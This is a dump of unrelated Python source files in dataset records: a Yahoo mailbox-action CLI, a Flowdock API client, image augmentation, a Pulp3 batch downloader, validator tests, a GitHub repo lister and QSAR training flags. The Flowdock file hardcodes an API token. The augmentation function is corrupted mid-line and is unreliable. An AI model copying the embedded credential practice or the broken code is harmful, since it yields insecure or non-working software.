{app_settings.CONTACT_ME} |\n| |\n+----------------------------------------------------------------------------+\n\n\"\"\"\n\tclick.secho(introduction, fg='bright_black')\n\n\ndef show_actions_list():\n\tactions = get_available_actions()\n\th1 = ' Yahoo actions list:'\n\tclick.secho(h1, fg='cyan')\n\tclick.secho('-' * len(h1), fg='cyan')\n\n\tfor i, action in enumerate(actions, 1):\n\t\taction_string_parts = action.name.split('_')\n\t\taction_pos = action_string_parts[0]\n\t\taction_name = '_'.join(action_string_parts[1:])\n\t\tprint(f' {i} - ({action_pos}) {action_name}')\n\n\ndef get_action():\n\n\tactions = get_available_actions()\n\tshow_actions_list()\n\ttry:\n\t\tclick.secho('\\nPlease choose the action you want ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\tnum = int(input())\n\t\twhile num < 1 or num > len(actions):\n\t\t\tclick.secho('Oops! Action not found.', fg='red')\n\t\t\tclick.secho('Please choose an action from the list above ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\t\tnum = int(input())\n\texcept KeyboardInterrupt:\n\t\texit()\n\treturn actions[num - 1]\n\n\ndef get_actions():\n\tactions = get_available_actions()\n\tresult = []\n\tshow_actions_list()\n\ttry:\n\t\tclick.secho('\\nPlease choose actions you want ? (Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\tactions_string = [ int(n) for n in str(input()).split(' ')]\n\t\tfor num in actions_string:\n\t\t\twhile num < 1 or num > len(actions):\n\t\t\t\tclick.secho(f'Oops! Action {num} not found.', fg='red')\n\t\t\t\texit()\n\t\t\t\t# click.secho('Please choose actions from the list above ? 
(Ctrl+C to exit): ', fg='yellow', nl=False)\n\t\t\t\t# num = int(input())\n\t\t\tresult.append(actions[num - 1])\n\texcept KeyboardInterrupt:\n\t\texit()\n\treturn result\n\n\ndef get_available_actions():\n\tfrom app import Yahoo\n\treturn Yahoo.get_available_actions()\n\n\ndef get_mailbox_messages_range(total_messages):\n\t\"\"\" Get the min and max number of messages to open from the mailbox. \"\"\"\n\tx_min = min(total_messages, app_settings.MESSAGES_MIN_OPEN)\n\tx_max = min(total_messages, app_settings.MESSAGES_MAX_OPEN)\n\treturn x_min, x_max\n\ndef get_amount_of_message(total_messages):\n\t\"\"\"Get the amount of messages to open.\"\"\"\n\treturn random.randint(*get_mailbox_messages_range(total_messages))\n\n\ndef prettify_seconds(sec):\n\tif sec < 60: \t\t# less than 1 minute.\n\t\treturn '%.2f seconds' % sec\n\telif sec / 60 < 60: # less than 1 hour.\n\t\treturn '%.2f minutes' % (sec / 60)\n\telif sec / 3600 < 24: # less than 1 day.\n\t\treturn '%.2f hours' % (sec / 3600)\n\n\t# return in days.\n\treturn '%.2f days' % (sec / 86400)\n\n","sub_path":"app/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12267034","text":"# coding: utf-8\nimport requests\nimport json\nfrom re import match, IGNORECASE\n\nMESSAGES_API_URL = \"https://api.flowdock.com/messages\"\n\nEMAIL = r\"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\"\nALPHANUMERIC_UNDERSCORES_WHITESPACE = r'^[a-z0-9_ ]+$'\n\n\n# \"flow_token\": \"cbc4d9ca8000ad74058724084f929fff\",\n# \"event\": \"activity\",\n# \"author\": {\n# \"name\": \"Marty\",\n# \"avatar\": \"https://avatars.githubusercontent.com/u/3017123?v=3\"\n# },\n# \"title\": \"updated ticket\",\n# \"external_thread_id\": \"1234567\",\n# \"thread\": {\n# \"title\": \"Polish the flux capacitor\",\n# \"body\": \"The flux capacitor has been in storage for more than 30 years and it needs to be spick and span for the re-launch.\",\n# \"status\": {\n# \"color\": \"green\",\n# \"value\": \"open\"\n# }\n# }\n\n\nclass MessageAPI(object):\n\tAPI_URL = MESSAGES_API_URL\n\n\tdef __init__(self, flow_token, author, thread_title, thread_body, thread_id, avatar = None):\n\t\tself.msg = {'flow_token':flow_token}\n\t\tself.msg['event'] = 'activity'\n\n\t\tauthor = {'name':author, 'avatar' :avatar}\n\t\tself.msg['author'] = author\n\n\t\tself.msg['external_thread_id'] = thread_id\n\t\tthread = {'title':thread_title, 'body':thread_body}\n\t\tself.msg['thread'] = thread\n\n\tdef __repr__(self):\n\t\treturn \"%s(%s) instance at %s\" % (self.__class__.__name__, self.msg['flow_token'], hex(id(self)))\n\n\tdef post(self, title):\n\t\tnew_msg = self.msg.copy()\n\t\tnew_msg.update({'title':title})\n\n\t\tprint(json.dumps(new_msg))\n\t\tprint(self.API_URL)\n\t\t\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\n\t\tresponse = requests.post(self.API_URL, data=json.dumps(new_msg), headers = headers,)\n\t\tif not response.ok:\n\t\t\tresponse.raise_for_status()\n\t\treturn True\n\n\nif __name__ == \"__main__\":\n\t# Initialize tasks and results object\n\tinbox = MessageAPI('cbc4d9ca8000ad74058724084f929fff', author='luca', avatar = \"https://avatars.githubusercontent.com/u/3017123?v=3\",\n\t thread_title = 'FTP file download', \n\t\tthread_body='Status of file download', thread_id='jfkdjskafjadskf')\n# With required params only\n\tprint(inbox.post('File 
updated'))","sub_path":"flowdock/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"509188066","text":"\"\"\"\n\nCOLOR PALLETTE - Using k-means clustering to pick out the color palette from a given image\nProcess: \n(1) Read in image\n(2) Resize image\n(3) Pick out RGB values -> convert to LAB values\n(4) PLT - Axes3D Plot LAB values\n(5) Run clusters thru k-means clustering\n(6) Print out gradient of colors\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage import io, color\n\n\ndef processImage(filename: str) -> list:\n image = io.imread(filename)\n return color.rgb2lab(image)\n\n\ndef plotClusters(filename: str):\n lab = processImage(filename)\n print(lab)\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(lab[0].flatten(), lab[1].flatten(), lab[2].flatten())\n plt.show()\n\n\ndef findKMeans():\n pass\n\n\ndef createPallete():\n plotClusters(\"test.jpg\")\n findKMeans()\n\n\ndef main():\n try:\n createPallete()\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55431041","text":"import random\nimport cv2\nimport Augmentor\nimport numpy as np\nimport os, shutil\n\nfrom distutils.dir_util import copy_tree\n\n\ndef unet_augment(sample,vertical_prob,horizontal_prob):\n image, mask= sample['image'], sample['mask']\n\n if (random.random() AUGMENT_DIR 로 복사\n\n path, dirs, _ = list(os.walk(aug_dir))[0]\n for folder in dirs:\n print('folder :', folder)\n augmnt = Augmentor.Pipeline(\n '{}/{}'.format(path, folder), output_directory='', save_format='bmp')\n\n # Add some operations to an existing pipeline.\n augmnt.flip_left_right(probability=0.4)\n # Now we add a vertical flip operation to the pipeline:\n augmnt.flip_top_bottom(probability=0.8)\n # Add a rotate90 operation to the pipeline:\n # augmnt.rotate90(probability=0.5)\n \n # number of images to augment\n augmnt.sample(aug_num)\n\n return 'Done!'\n","sub_path":"U-Net/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394157059","text":"# Constants mapping to the Item table.\nModelNumber = 'ModelNumber'\nbstockCategory = 'bstockCategory'\nbstockSubcategory = 'bstockSubCategory'\nBrand = 'Brand'\nMSRP = 'MSRP'\nMAP = 'MAP'\nWeight = 'Weight'\nShipWeight = 'ShipWeight'\nImageLocation = 'ImageLocation'\nImageMime = 'ImageMime'\n\n# Constants mapping to the Marketplace table.\nidMarketplace = 'idMarketplace'\nmktpName = 'mktpName'\n\n# Constants mapping to the ItemDescription table.\nSKU = 'SKU'\nUPC = 'UPC'\nDescription = 'Description'\nRetailPrice = 'RetailPrice' \nmktCategory = 'mktCategory'\nmktSubcategory = 'mktSubcategory'\n","sub_path":"util/db/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"318296694","text":"from concurrent.futures import ThreadPoolExecutor\nfrom gettext import gettext as _\nfrom logging import getLogger\nfrom queue import Queue, Empty\nfrom threading import Thread, current_thread\n\nLOG = getLogger(__name__)\n\n\n# The default queuing backlog.\nBACKLOG = 
1024\n# The default concurrency.\nCONCURRENT = 10\n\n\nclass Batch:\n \"\"\"\n Provides batching and concurrent execution of download requests.\n\n Attributes:\n requests (generator): A generator of requests.\n concurrent (int): The number of requests to execute concurrently.\n iterator (RequestIterator): Used to iterate requests as they complete.\n feeder (RequestFeeder): Used to feed requests to the executor.\n scratchpad (dict): A scratchpad for sharing information with requests.\n\n Notes:\n * The batch should be used as a context manager.\n * Or, `shutdown()` must be called manually.\n\n Examples:\n\n >>>\n >>> from pulp3.download import HttpRequest\n >>>\n >>> url = 'http://content.org/dog.rpm'\n >>> destination = '/tmp/working/dog.rpm'\n >>> requests = (HttpRequest(url, destination) for _ in range(10))\n >>>\n >>> # Using context manager (highly recommended)\n >>>\n >>> with Batch(requests) as batch:\n >>> for request in batch.download():\n >>> if request.succeeded():\n >>> # Use the downloaded file \o/\n >>> else:\n >>> # Log something\n >>>\n >>> # Not using context manager\n >>>\n >>> batch = Batch(requests)\n >>> try:\n >>> for request in batch.download():\n >>> if request.succeeded():\n >>> # Use the downloaded file \o/\n >>> else:\n >>> # Log something\n >>> finally:\n >>> batch.shutdown()\n >>>\n\n \"\"\"\n\n def __init__(self, requests, concurrent=CONCURRENT, backlog=BACKLOG, **scratchpad):\n \"\"\"\n Args:\n requests (generator): A generator of requests.\n concurrent (int): The number of requests to execute concurrently.\n backlog (int): The number of download requests kept in memory.\n **scratchpad (dict): A scratchpad for sharing information with requests.\n\n \"\"\"\n super(Batch, self).__init__()\n self.requests = requests\n self.concurrent = concurrent\n self.iterator = RequestIterator(backlog)\n self.feeder = RequestFeeder(self)\n self.scratchpad = scratchpad\n if concurrent < 2:\n raise ValueError(_('concurrent may not be < 2'))\n if backlog < concurrent:\n raise ValueError(_('backlog may not be < concurrent'))\n\n def download(self):\n \"\"\"\n Download the batch by executing all of the requests.\n\n Returns:\n RequestIterator: A request iterator.\n The iterator will render the requests in the order completed.\n\n \"\"\"\n LOG.debug(_('%(batch)s - download started'), {'batch': self})\n self.feeder.start()\n return self.iterator\n\n def shutdown(self):\n \"\"\"\n End processing and shutdown the feeder and the thread pool.\n\n Notes:\n This must be called to prevent leaking resources unless the Batch\n is used as a context manager.\n >>>\n >>> with Batch(..) 
as batch:\n >>> # ...\n\n \"\"\"\n LOG.debug(_('%(batch)s - shutdown'), {'batch': self})\n self.feeder.abort()\n\n def abort(self):\n \"\"\"\n Abort downloading and shutdown.\n \"\"\"\n LOG.debug(_('%(batch)s - download aborted'), {'batch': self})\n self.shutdown()\n\n def __enter__(self):\n return self\n\n def __exit__(self, *unused):\n self.shutdown()\n\n def __str__(self):\n _id = str(id(self))[-4:]\n return _('Batch: id={s} concurrent={c}').format(s=_id, c=self.concurrent)\n\n\nclass BatchExecutor(ThreadPoolExecutor):\n \"\"\"\n Batch thread pool executor.\n \"\"\"\n\n def __init__(self, concurrent=CONCURRENT):\n \"\"\"\n A thread pool executor tailored for the batch.\n The worker queue size is restricted to limit memory usage and to expedite shutdown.\n The shutdown() method is overridden to work properly with a queue\n with limited capacity.\n\n Args:\n concurrent (int): The number of requests to execute concurrently.\n\n \"\"\"\n super(BatchExecutor, self).__init__(max_workers=concurrent)\n self._work_queue = Queue(maxsize=concurrent)\n\n def drain(self):\n \"\"\"\n Drain the input queue.\n \"\"\"\n try:\n self._work_queue.get(block=False)\n except Empty:\n pass\n\n def shutdown(self, wait=True):\n \"\"\"\n Shutdown the executor.\n Mainly needed to compensate for ThreadPoolExecutor.shutdown() that expects\n an unrestricted queue capacity. Specifically, the terminate signal (None)\n sent to the workers is read and blindly put back into the queue for the next\n worker. This results in a (None) message queued in the worker queue after all\n workers have terminated. The queue is drained to prevent the interpreter shutdown\n hook from blocking.\n\n Args:\n wait (bool): Wait for all workers to terminate.\n\n \"\"\"\n if self._shutdown:\n return\n super(BatchExecutor, self).shutdown(wait)\n self.drain()\n\n\nclass RequestFeeder(Thread):\n \"\"\"\n Request feeder.\n A thread used to feed each batched request into the executor.\n May be interrupted and terminated by calling abort().\n\n Attributes:\n batch (Batch): A batch to feed.\n aborted (bool): Feeding has been aborted.\n\n \"\"\"\n\n def __init__(self, batch):\n super(RequestFeeder, self).__init__(name='feeder')\n self.batch = batch\n self.aborted = False\n self.setDaemon(True)\n\n def abort(self, wait=True):\n \"\"\"\n Abort feeding and terminate.\n\n Args:\n wait (bool): Wait for thread to terminate.\n\n \"\"\"\n self.aborted = True\n if wait:\n self.join()\n\n def run(self):\n \"\"\"\n Thread (main) loop.\n Submit each request to the batch executor.\n \"\"\"\n n = 0\n iterator = self.batch.iterator\n requests = self.batch.requests\n scratchpad = self.batch.scratchpad\n with BatchExecutor(self.batch.concurrent) as executor:\n try:\n for request in requests:\n if self.aborted:\n iterator.abort()\n return\n LOG.debug(\n _('%(feeder)s - feed #%(n)d url=%(url)s'),\n {\n 'feeder': self,\n 'n': n,\n 'url': request.url\n })\n scratchpad.update(request.scratchpad)\n request.scratchpad = scratchpad\n future = executor.submit(BatchRequest(request))\n future.add_done_callback(iterator.add)\n n += 1\n except Exception as e:\n iterator.raised(e)\n n += 1\n if n:\n iterator.total = n\n else:\n iterator.empty()\n\n def __str__(self):\n _id = str(id(self))[-4:]\n return _('RequestFeeder: id={s} aborted={a}').format(s=_id, a=self.aborted)\n\n\nclass QueueIterator:\n \"\"\"\n A Queue iterator.\n Each item in the queue is a tuple of: (code, payload).\n\n Attributes:\n queue (Queue): The input queue to be iterated.\n iterated (int): The number of 
times `__next__()` was called.\n total (int): The total number queued. A value of `-1` indicates\n the total is not yet known.\n\n \"\"\"\n\n NEXT = 'NEXT'\n EXCEPTION = 'EXCEPTION'\n END = 'END'\n\n def __init__(self, backlog=BACKLOG):\n self.queue = Queue(maxsize=backlog)\n self.aborted = False\n self.iterated = 0\n self.total = -1\n\n def abort(self):\n \"\"\"\n Abort iteration.\n Set the abort flag and drain the queue just in case something\n is blocked on put().\n \"\"\"\n if self.aborted:\n return\n self.aborted = True\n self.empty()\n\n def put(self, code, payload=None, block=True):\n \"\"\"\n Enqueue a message.\n\n Args:\n code (str): The message code.\n payload (object): The message payload.\n block (bool): Block when queue is full (default:True).\n\n \"\"\"\n LOG.debug(\n _('%(iterator)s put: code=%(code)s payload=%(payload)s'),\n {\n 'iterator': self,\n 'code': code,\n 'payload': payload\n })\n message = (code, payload)\n self.queue.put(message, block=block)\n\n def add(self, payload):\n \"\"\"\n Add the next object to the input queue to be rendered by `__next__()`.\n\n Args:\n payload: An object to be rendered by `__next__()`.\n\n \"\"\"\n if self.aborted:\n return\n self.put(self.NEXT, payload)\n\n def raised(self, exception):\n \"\"\"\n Add a fatal exception to the input queue. The exception has been raised by\n the object providing the objects to be iterated.\n\n Args:\n exception: An exception to be raised by `__next__()`.\n\n \"\"\"\n if self.aborted:\n return\n self.put(self.EXCEPTION, exception)\n\n def drain(self):\n \"\"\"\n Drain the input queue.\n \"\"\"\n LOG.debug(_('%(iterator)s - input drained'), {'iterator': self})\n while True:\n try:\n self.queue.get(block=False)\n except Empty:\n break\n self.end()\n\n def empty(self):\n \"\"\"\n Add a message to the input queue that signals that the input\n queue will always be empty. 
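An END message is also enqueued so that a consumer blocked in `__next__()` wakes up instead of waiting forever.\n 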
The object feeding the queue has nothing\n to be iterated.\n \"\"\"\n self.drain()\n self.end()\n\n def end(self):\n \"\"\"\n Add a message to the input queue that marks the end of input.\n \"\"\"\n self.put(self.END)\n\n def __next__(self):\n \"\"\"\n Get the next enqueued object.\n\n Returns:\n The next enqueued object.\n\n Raises:\n StopIteration: when finished iterating.\n\n \"\"\"\n LOG.debug(_('%(iterator)s - next'), {'iterator': self})\n\n if self.aborted:\n raise StopIteration()\n if self.iterated == self.total:\n raise StopIteration()\n\n code, payload = self.queue.get()\n\n LOG.debug(\n _('%(iterator)s next: code=%(code)s payload=%(payload)s'),\n {\n 'iterator': self,\n 'code': code,\n 'payload': payload\n })\n\n # next\n if code == self.NEXT:\n self.iterated += 1\n return payload\n # fatal\n if code == self.EXCEPTION:\n raise payload\n # empty\n if code == self.END:\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n def __str__(self):\n _id = str(id(self))[-4:]\n description = 'Iterator: id={s} iterated={i}/{t} aborted={a}'\n return _(description.format(\n s=_id,\n i=self.iterated,\n t=self.total,\n a=self.aborted))\n\n\nclass FutureIterator(QueueIterator):\n \"\"\"\n A queue iterator that expects the payload to be a `concurrent.futures.Future`.\n \"\"\"\n\n def __next__(self):\n \"\"\"\n Get the next future and propagate any raised exceptions.\n\n Returns:\n The next `Future.result()`\n\n Raises:\n Anything raised by the object executed.\n\n \"\"\"\n future = super(FutureIterator, self).__next__()\n exception = future.exception()\n if exception:\n LOG.debug(\n _('%(iterator)s - raising: %(exception)s'),\n {\n 'iterator': self,\n 'exception': exception\n })\n raise exception\n else:\n return future.result()\n\n\nclass RequestIterator(FutureIterator):\n \"\"\"\n Provided for semantic clarity.\n \"\"\"\n pass\n\n\nclass BatchRequest:\n \"\"\"\n Batched request wrapper.\n Ensures the request is returned after being executed in the pool.\n\n Attributes:\n request (Request): The wrapped request.\n\n \"\"\"\n\n def __init__(self, request):\n \"\"\"\n Args:\n request (Request): The wrapped request.\n\n \"\"\"\n self.request = request\n\n def __call__(self):\n \"\"\"\n Execute the wrapped request.\n\n Returns:\n request (Request): The wrapped request.\n\n Raises:\n Whatever is raised by request()\n\n \"\"\"\n thread = current_thread()\n LOG.debug(_(\n '%(request)s thread=%(thread)s - started'),\n {\n 'thread': thread.getName(),\n 'request': self\n })\n\n try:\n self.request()\n return self.request\n finally:\n LOG.debug(_(\n '%(request)s thread=%(thread)s - end'),\n {\n 'thread': thread.getName(),\n 'request': self\n })\n\n def __str__(self):\n return str(self.request)\n","sub_path":"pulp3/download/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405129152","text":"'''\nCreated on 12/06/2014\n\n:author: alfred\n'''\nfrom unittest import TestCase\n\nfrom dirty_models.fields import StringIdField\nfrom dirty_validators.complex import ModelValidate\nfrom werkzeug.exceptions import NotFound\n\nfrom mc_be.commons.fields import ModelIdField\nfrom mc_be.commons.filter_list import FilterList\nfrom mc_be.commons.models.models import PersistentModel\nfrom mc_be.commons.streams.iterator import ListIterator\nfrom mc_be.commons.validators import Unique, RefModelId, EqualField, NotEqualField\nfrom tests import BaseTestCase, mock_session_org_type\n\n\nclass FakeModel(PersistentModel):\n label = 
StringIdField()\n second_id = StringIdField()\n model_ref = ModelIdField()\n field_1 = StringIdField()\n field_2 = StringIdField()\n\n def get_resource_id(self):\n return 'fake'\n\n\nclass FakeService:\n\n def __init__(self):\n self.results = [FakeModel(id='aaa', second_id='bbb', label='ccc')]\n self.result_load = FakeModel(id='aaa', second_id='bbb', label='ccc')\n\n def list_all(self, filter_list=None, paging=None):\n self.filter_list = filter_list\n\n return ListIterator(self.results)\n\n def load(self, id):\n if self.result_load:\n return self.result_load\n raise NotFound(\"Not found\")\n\n def build_filter_list(self, params):\n self.params = params\n return FilterList()\n\n\nclass UniqueTest(BaseTestCase, TestCase):\n\n def setUp(self):\n super(UniqueTest, self).setUp()\n self.service = FakeService()\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n self.service.results = []\n\n model = FakeModel(label='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'aaa'})\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n model = FakeModel(label='ccc')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages, {'label': {'alreadyUsed': \"'ccc' is already used by item 'aaa'\"}})\n\n def test_success_same_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n model = FakeModel(label='ccc', id='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'ccc'})\n\n def test_fail_multi_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service, identifiers=['id', 'second_id'])\n\n model = FakeModel(label='ccc', id='aaa')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages, {'label': {'alreadyUsed': \"'ccc' is already used by item 'aaa:bbb'\"}})\n\n def test_success_multi_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service, identifiers=['id', 'second_id'])\n\n model = FakeModel(label='ccc', second_id='bbb', id='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'ccc'})\n\n\nclass RefModelIdTest(BaseTestCase, TestCase):\n\n def setUp(self):\n super(RefModelIdTest, self).setUp()\n self.service = FakeService()\n\n def test_success(self):\n validator = RefModelId(service=self.service)\n\n self.assertTrue(validator.is_valid('aaaa'))\n\n def test_fail_not_found(self):\n validator = RefModelId(service=self.service)\n self.service.result_load = False\n\n self.assertFalse(validator.is_valid('aaaa'))\n self.assertDictEqual(validator.messages, {'notFound': \"Item 'aaaa' not found\"})\n\n def test_success_permission_not_modified(self):\n validator = RefModelId(service=self.service, check_permission='read')\n\n self.assertTrue(validator.is_valid('aaaa', is_modified=False))\n\n @mock_session_org_type('provider')\n def test_success_permission_modified(self):\n validator = RefModelId(service=self.service, 
check_permission='read')\n\n with self.app.test_request_context():\n self.app.preprocess_request()\n self.assertTrue(validator.is_valid('aaaa', is_modified=True))\n\n @mock_session_org_type('provider')\n def test_fail_permission_modified(self):\n validator = RefModelId(service=self.service, check_permission='shake')\n\n with self.app.test_request_context():\n self.app.preprocess_request()\n self.assertFalse(validator.is_valid('aaaa', is_modified=True))\n self.assertDictEqual(validator.messages,\n {'notAllowed': \"Item 'aaaa' is not allowed by permission 'shake'\"})\n\n\nclass EqualFieldTest(TestCase):\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n field_1 = EqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n field_1 = EqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='bbb')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages,\n {'field_1': {'notEqualFieldValue': \"Item value: aaa must be equal to field_2 value: bbb\"}})\n\n\nclass NotEqualFieldTest(TestCase):\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n field_1 = NotEqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='bbb')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n field_1 = NotEqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='aaa')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages,\n {'field_1': {'equalFieldValue': \"Item value: aaa can not be equal to field_2 value: aaa\"}})\n","sub_path":"mc-pybe-release-smip-R4/tests/commons/validators/tests_validators.py","file_name":"tests_validators.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219467320","text":"import requests, json\nfrom multiprocessing import Process, Manager\nfrom process import extract_repo_fields\n\n\ndef list_repos(token, since):\n res = requests.get(\n f'https://api.github.com/repositories?since={since}',\n headers={'Authorization': f'token {token}'}\n )\n return json.loads(res.content.decode('utf-8'))\n\n\ndef get_repo_details(owner, name, token):\n repo_details = json.loads(requests.get(\n f'https://api.github.com/repos/{owner}/{name}',\n headers={'Authorization': f'token {token}'}\n ).content.decode('utf-8'))\n return repo_details\n\n\ndef get_repo_details_parallel(repos_details, owner, name, token):\n repo_details = json.loads(requests.get(\n f'https://api.github.com/repos/{owner}/{name}',\n headers={'Authorization': f'token {token}'}\n ).content.decode('utf-8'))\n repos_details.append(repo_details)\n\n\ndef get_repos(token, repos):\n repos_details = []\n for repo in repos:\n try:\n owner = repo['owner']['login']\n name = repo['name']\n repo_details = get_repo_details(owner, name, token)\n repo_fields = extract_repo_fields(repo_details)\n repos_details.append(repo_fields)\n except Exception as e:\n print(f'Failed extracting information for {repo[\"id\"]}')\n pass\n return repos_details\n\n\ndef get_repos_parallel(token, repos):\n with Manager() as manager:\n 
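# Manager().list() returns a process-shared list proxy, so items appended by the worker processes below are visible to the parent here.\n 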
repos_details = manager.list()\n repo_get_processes = []\n for repo in repos:\n owner = repo['owner']['login']\n name = repo['name']\n process = Process(target=get_repo_details_parallel, args=(repos_details, owner, name, token))\n process.start()\n repo_get_processes.append(process)\n for p in repo_get_processes:\n p.join()\n\n repo_field_details = []\n for repo_details in repos_details:\n try:\n repo_fields = extract_repo_fields(repo_details)\n repo_field_details.append(repo_fields)\n except:\n raise\n return repo_field_details\n\n\ndef list_and_get_repo_details(token, since):\n repos = list_repos(token, since)\n repos_details = get_repos(token, repos)\n # repos_details = get_repos_parallel(token, repos)\n return repos_details\n\n\ndef get_rate_remaining(token):\n res = requests.get(\n f'https://api.github.com/rate_limit',\n headers={'Authorization': f'token {token}'}\n )\n rate_details = json.loads(res.content.decode('utf-8'))\n return rate_details['rate']['remaining']","sub_path":"ghrepos-loader/read_ghrepos_serial.py","file_name":"read_ghrepos_serial.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580855124","text":"from timeit import default_timer as time\nimport os\nimport sys\nimport logging\nfrom datetime import datetime\nfrom argparse import Namespace\nimport optuna\nimport pandas as pd\nimport numpy as np\nimport torch\nimport chemprop.utils\n\nfrom absl import app\nfrom absl import flags\n\nimport rdkit\nprint(rdkit.__version__)\n\nDELQSAR_ROOT = os.path.abspath(__file__ + '/../../')\nsys.path += [os.path.dirname(DELQSAR_ROOT)]\n\nRESULTS_FILE = os.path.join(DELQSAR_ROOT, 'experiments', 'all_results.csv')\n\nfrom del_qsar import featurizers, splitters, models, losses\nfrom del_qsar.enrichments import R_from_z, R_ranges\n\n\nFLAGS = flags.FLAGS\nflags.DEFINE_string('csv', 'triazine_lib_sEH_SIRT2_QSAR.csv', 'csv filename')\nflags.DEFINE_list('exp', ['sEH_[strep]_tot'], 'Column header(s) for data counts: experiment')\nflags.DEFINE_list('beads', ['beads-linker-only_[strep]_tot'], 'Column header(s) for data counts: beads')\nflags.DEFINE_enum('featurizer', 'graph', ['graph'], 'How molecules are featurized')\nflags.DEFINE_list('splitter', ['random'], 'How molecules are split for training/testing') \nflags.DEFINE_integer('seed', 0, 'Random seed for data splitting and weight initialization')\n\nflags.DEFINE_enum('model_type', 'MoleculeModel', ['MoleculeModel'], 'Model type')\nflags.DEFINE_enum('task_type', 'regression', ['regression', 'classification'], 'Task type')\n\nflags.DEFINE_enum('threshold_type', 'percentile', ['percentile', 'fixed'], \n 'Threshold type (for classification only)')\nflags.DEFINE_float('threshold_val', 99.99, 'Threshold value; exact value or percentile (for classification only)')\n\nflags.DEFINE_enum('loss_fn_train', 'nlogprob', ['nlogprob', 'MSE', 'BCE'], \n 'Loss function during training (note: classifiers automatically use BCE)')\n\nflags.DEFINE_integer('depth', 6, 'Number of message-passing steps')\nflags.DEFINE_integer('hidden_size', 1500, 'Size of hidden layers in MPN')\nflags.DEFINE_integer('ffn_num_layers', 2, 'Number of layers in FFN after MPN encoding')\n\nflags.DEFINE_float('lr', None, 'Initial learning rate')\nflags.DEFINE_integer('max_epochs', 100, 'Maximum number of epochs')\nflags.DEFINE_integer('patience', 5, 'Patience')\nflags.DEFINE_float('max_norm', 5, 'Max norm')\nflags.DEFINE_float('dropout', 0, 'Dropout 
